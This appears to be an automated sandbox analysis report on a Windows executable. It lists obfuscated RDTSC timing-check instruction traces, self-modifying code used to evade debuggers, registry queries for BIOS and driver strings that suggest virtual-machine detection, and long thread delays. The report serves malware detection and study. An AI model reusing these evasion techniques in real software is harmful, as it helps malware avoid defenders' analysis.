Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 46B0647 second address: 46B06A9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC218F099C0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [ebx+58h] 0x0000000c pushad 0x0000000d movzx eax, dx 0x00000010 popad 0x00000011 mov dword ptr [esi+1Ch], eax 0x00000014 jmp 00007FC218F099C4h 0x00000019 mov eax, dword ptr [ebx+5Ch] 0x0000001c pushad 0x0000001d pushfd 0x0000001e jmp 00007FC218F099BEh 0x00000023 jmp 00007FC218F099C5h 0x00000028 popfd 0x00000029 push eax 0x0000002a push edx 0x0000002b mov si, AA5Dh 0x0000002f rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 46B06A9 second address: 46B070B instructions: 0x00000000 rdtsc 0x00000002 call 00007FC2192E858Ah 0x00000007 pop ecx 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b mov dword ptr [esi+20h], eax 0x0000000e jmp 00007FC2192E8591h 0x00000013 mov eax, dword ptr [ebx+60h] 0x00000016 jmp 00007FC2192E858Eh 0x0000001b mov dword ptr [esi+24h], eax 0x0000001e push eax 0x0000001f push edx 0x00000020 pushad 0x00000021 pushfd 0x00000022 jmp 00007FC2192E858Dh 0x00000027 adc eax, 1FB74806h 0x0000002d jmp 00007FC2192E8591h 0x00000032 popfd 0x00000033 popad 0x00000034 rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 46B070B second address: 46B0711 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 46B0711 second address: 46B0715 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 46B0715 second address: 46B074D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC218F099C6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [ebx+64h] 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FC218F099C7h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 46B074D second address: 46B07B5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC2192E8599h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esi+28h], eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f pushfd 0x00000010 jmp 00007FC2192E8593h 0x00000015 add si, 16AEh 0x0000001a jmp 00007FC2192E8599h 0x0000001f popfd 0x00000020 call 00007FC2192E8590h 0x00000025 pop eax 0x00000026 popad 0x00000027 rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 46B07B5 second address: 46B07BA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 46B07BA second address: 46B07E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC2192E858Ch 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov eax, dword ptr [ebx+68h] 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FC2192E8597h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 46B07E9 second address: 46B0817 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov eax, edx 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esi+2Ch], eax 0x0000000d jmp 00007FC218F099C7h 0x00000012 mov ax, word ptr [ebx+6Ch] 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 46B0817 second address: 46B081B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 46B081B second address: 46B0821 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 46B0821 second address: 46B0827 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 46B0827 second address: 46B0864 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC218F099C4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov word ptr [esi+30h], ax 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 pushfd 0x00000013 jmp 00007FC218F099BCh 0x00000018 xor al, FFFFFFA8h 0x0000001b jmp 00007FC218F099BBh 0x00000020 popfd 0x00000021 rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 46B0864 second address: 46B08D1 instructions: 0x00000000 rdtsc 0x00000002 mov si, 089Fh 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 mov ax, word ptr [ebx+00000088h] 0x00000010 jmp 00007FC2192E8591h 0x00000015 mov word ptr [esi+32h], ax 0x00000019 pushad 0x0000001a pushfd 0x0000001b jmp 00007FC2192E858Ch 0x00000020 jmp 00007FC2192E8595h 0x00000025 popfd 0x00000026 mov edx, ecx 0x00000028 popad 0x00000029 mov eax, dword ptr [ebx+0000008Ch] 0x0000002f push eax 0x00000030 push edx 0x00000031 jmp 00007FC2192E8599h 0x00000036 rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 46B08D1 second address: 46B0904 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC218F099C1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esi+34h], eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f jmp 00007FC218F099C3h 0x00000014 mov cx, 901Fh 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 46B0904 second address: 46B0956 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC2192E8595h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [ebx+18h] 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007FC2192E858Ch 0x00000013 jmp 00007FC2192E8595h 0x00000018 popfd 0x00000019 call 00007FC2192E8590h 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 46B0956 second address: 46B0962 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 popad 0x00000006 mov dword ptr [esi+38h], eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 46B0962 second address: 46B09AE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC2192E8596h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ah, 24h 0x0000000b popad 0x0000000c mov eax, dword ptr [ebx+1Ch] 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 pushfd 0x00000013 jmp 00007FC2192E8596h 0x00000018 sub ah, FFFFFFD8h 0x0000001b jmp 00007FC2192E858Bh 0x00000020 popfd 0x00000021 push ecx 0x00000022 pop edi 0x00000023 popad 0x00000024 rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 46B09AE second address: 46B09F8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC218F099C5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esi+3Ch], eax 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007FC218F099BCh 0x00000013 xor eax, 63BCA168h 0x00000019 jmp 00007FC218F099BBh 0x0000001e popfd 0x0000001f mov cx, FB5Fh 0x00000023 popad 0x00000024 mov eax, dword ptr [ebx+20h] 0x00000027 pushad 0x00000028 push eax 0x00000029 push edx 0x0000002a mov dx, si 0x0000002d rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 46B09F8 second address: 46B0A0C instructions: 0x00000000 rdtsc 0x00000002 mov cx, 4129h 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov cl, C6h 0x0000000a popad 0x0000000b mov dword ptr [esi+40h], eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 46B0A0C second address: 46B0A10 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 46B0A10 second address: 46B0A2A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC2192E8596h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 46B0A2A second address: 46B0A30 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 46B0A30 second address: 46B0A34 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 46B0A34 second address: 46B0A4D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 lea eax, dword ptr [ebx+00000080h] 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 mov esi, 1B2C6AB1h 0x00000016 mov edi, ecx 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 46B0A4D second address: 46B0AAF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bx, 3E9Ch 0x00000007 movsx ebx, ax 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push 00000001h 0x0000000f jmp 00007FC2192E858Ch 0x00000014 nop 0x00000015 pushad 0x00000016 jmp 00007FC2192E858Eh 0x0000001b jmp 00007FC2192E8592h 0x00000020 popad 0x00000021 push eax 0x00000022 jmp 00007FC2192E858Bh 0x00000027 nop 0x00000028 push eax 0x00000029 push edx 0x0000002a jmp 00007FC2192E8595h 0x0000002f rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 46B0AAF second address: 46B0AE8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC218F099C1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 lea eax, dword ptr [ebp-10h] 0x0000000c pushad 0x0000000d push eax 0x0000000e mov ecx, edx 0x00000010 pop edi 0x00000011 jmp 00007FC218F099C4h 0x00000016 popad 0x00000017 nop 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c pushad 0x0000001d popad 0x0000001e rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 46B0AE8 second address: 46B0AEC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 46B0AEC second address: 46B0AF2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 46B0AF2 second address: 46B0B38 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov cx, 2111h 0x00000007 call 00007FC2192E858Eh 0x0000000c pop eax 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 pushfd 0x00000015 jmp 00007FC2192E858Dh 0x0000001a or esi, 2DE663D6h 0x00000020 jmp 00007FC2192E8591h 0x00000025 popfd 0x00000026 mov edx, esi 0x00000028 popad 0x00000029 rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 46B0B38 second address: 46B0B54 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC218F099C8h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 46B0BB7 second address: 46B0BBD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 46B0BBD second address: 46B0BC2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 46B0BC2 second address: 46B0BE8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC2192E8596h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 js 00007FC28BBD706Dh 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 46B0BE8 second address: 46B0BEC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 46B0BEC second address: 46B0BF0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 46B0BF0 second address: 46B0BF6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 46B0BF6 second address: 46B0C28 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC2192E8594h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [ebp-0Ch] 0x0000000c jmp 00007FC2192E8590h 0x00000011 mov dword ptr [esi+04h], eax 0x00000014 pushad 0x00000015 pushad 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 46B0C28 second address: 46B0C47 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 movzx ecx, bx 0x00000007 popad 0x00000008 mov ebx, 2F2FC0AAh 0x0000000d popad 0x0000000e lea eax, dword ptr [ebx+78h] 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007FC218F099BCh 0x00000018 rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 46B0C47 second address: 46B0C9A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FC2192E8591h 0x00000009 jmp 00007FC2192E858Bh 0x0000000e popfd 0x0000000f mov eax, 679A184Fh 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 push 00000001h 0x00000019 pushad 0x0000001a push eax 0x0000001b push edx 0x0000001c pushfd 0x0000001d jmp 00007FC2192E858Eh 0x00000022 jmp 00007FC2192E8595h 0x00000027 popfd 0x00000028 rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 46B0C9A second address: 46B0CE8 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007FC218F099C0h 0x00000008 and ecx, 363A5F58h 0x0000000e jmp 00007FC218F099BBh 0x00000013 popfd 0x00000014 pop edx 0x00000015 pop eax 0x00000016 mov ebx, ecx 0x00000018 popad 0x00000019 nop 0x0000001a jmp 00007FC218F099C2h 0x0000001f push eax 0x00000020 pushad 0x00000021 mov eax, edi 0x00000023 popad 0x00000024 nop 0x00000025 push eax 0x00000026 push edx 0x00000027 pushad 0x00000028 pushad 0x00000029 popad 0x0000002a mov edx, 6108F394h 0x0000002f popad 0x00000030 rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 46B0CE8 second address: 46B0D07 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC2192E858Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 lea eax, dword ptr [ebp-08h] 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FC2192E858Ah 0x00000015 rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 46B0D07 second address: 46B0D16 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC218F099BBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 46B0D16 second address: 46B0D1C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 46B0D1C second address: 46B0D20 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 46B0D20 second address: 46B0D24 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 46B0D24 second address: 46B0D55 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esp 0x00000009 jmp 00007FC218F099BCh 0x0000000e mov dword ptr [esp], eax 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007FC218F099C7h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 46B0D55 second address: 46B0D5B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 46B0D5B second address: 46B0D5F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 46B0D8A second address: 46B0D99 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC2192E858Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 46B0D99 second address: 46B0E02 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FC218F099BFh 0x00000008 mov edx, eax 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov edi, eax 0x0000000f pushad 0x00000010 movzx ecx, di 0x00000013 mov ebx, 4D408CE0h 0x00000018 popad 0x00000019 test edi, edi 0x0000001b pushad 0x0000001c call 00007FC218F099C5h 0x00000021 pushfd 0x00000022 jmp 00007FC218F099C0h 0x00000027 jmp 00007FC218F099C5h 0x0000002c popfd 0x0000002d pop eax 0x0000002e push eax 0x0000002f push edx 0x00000030 mov bx, 71D2h 0x00000034 rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 46B0E02 second address: 46B0E61 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 js 00007FC28BBD6E36h 0x0000000d pushad 0x0000000e jmp 00007FC2192E858Bh 0x00000013 push ecx 0x00000014 jmp 00007FC2192E858Fh 0x00000019 pop esi 0x0000001a popad 0x0000001b mov eax, dword ptr [ebp-04h] 0x0000001e pushad 0x0000001f mov dx, B718h 0x00000023 jmp 00007FC2192E8591h 0x00000028 popad 0x00000029 mov dword ptr [esi+08h], eax 0x0000002c jmp 00007FC2192E858Eh 0x00000031 lea eax, dword ptr [ebx+70h] 0x00000034 push eax 0x00000035 push edx 0x00000036 push eax 0x00000037 push edx 0x00000038 push eax 0x00000039 push edx 0x0000003a rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 46B0E61 second address: 46B0E65 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 46B0E65 second address: 46B0E6B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 46B0E6B second address: 46B0EE3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC218F099C4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push 00000001h 0x0000000b pushad 0x0000000c mov si, 996Dh 0x00000010 mov edi, eax 0x00000012 popad 0x00000013 nop 0x00000014 pushad 0x00000015 pushfd 0x00000016 jmp 00007FC218F099C2h 0x0000001b and esi, 6B5E8638h 0x00000021 jmp 00007FC218F099BBh 0x00000026 popfd 0x00000027 popad 0x00000028 push eax 0x00000029 jmp 00007FC218F099C5h 0x0000002e nop 0x0000002f jmp 00007FC218F099BEh 0x00000034 lea eax, dword ptr [ebp-18h] 0x00000037 push eax 0x00000038 push edx 0x00000039 push eax 0x0000003a push edx 0x0000003b push eax 0x0000003c push edx 0x0000003d rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 46B0EE3 second address: 46B0EE7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 46B0EE7 second address: 46B0F04 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC218F099C9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 46B0F04 second address: 46B0F36 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC2192E8591h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FC2192E8598h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 46B0F36 second address: 46B0F45 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC218F099BBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 46B100B second address: 46B100F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 46B100F second address: 46B1015 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 46B1015 second address: 46B1044 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FC2192E858Ch 0x00000009 sub ah, FFFFFFF8h 0x0000000c jmp 00007FC2192E858Bh 0x00000011 popfd 0x00000012 movzx esi, di 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 test edi, edi 0x0000001a push eax 0x0000001b push edx 0x0000001c pushad 0x0000001d mov si, C4C3h 0x00000021 popad 0x00000022 rdtsc
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	RDTSC instruction interceptor: First address: 46B11B9 second address: 46B11BD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc

Tries to evade debugger and weak emulator (self modifying code)

Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Special instruction interceptor: First address: 43BDE3 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Special instruction interceptor: First address: 5E03B5 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Special instruction interceptor: First address: 5E7545 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Special instruction interceptor: First address: 43BDDD instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Special instruction interceptor: First address: 6598BF instructions caused by: Self-modifying code

Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Memory allocated: 4710000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Memory allocated: 4B50000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Memory allocated: 4900000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc	Jump to behavior
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion	Jump to behavior
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion	Jump to behavior

Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe

Code function: 0_2_0043C0CD rdtsc

0_2_0043C0CD

Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Thread delayed: delay time: 599890	Jump to behavior
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Thread delayed: delay time: 599780	Jump to behavior
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Thread delayed: delay time: 599670	Jump to behavior
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Thread delayed: delay time: 599544	Jump to behavior
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Thread delayed: delay time: 599398	Jump to behavior
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Thread delayed: delay time: 599166	Jump to behavior
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Thread delayed: delay time: 599061	Jump to behavior
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Thread delayed: delay time: 598952	Jump to behavior
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Thread delayed: delay time: 598843	Jump to behavior
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Thread delayed: delay time: 598734	Jump to behavior
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Thread delayed: delay time: 598624	Jump to behavior
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Thread delayed: delay time: 598515	Jump to behavior
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Thread delayed: delay time: 598406	Jump to behavior
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Thread delayed: delay time: 598296	Jump to behavior
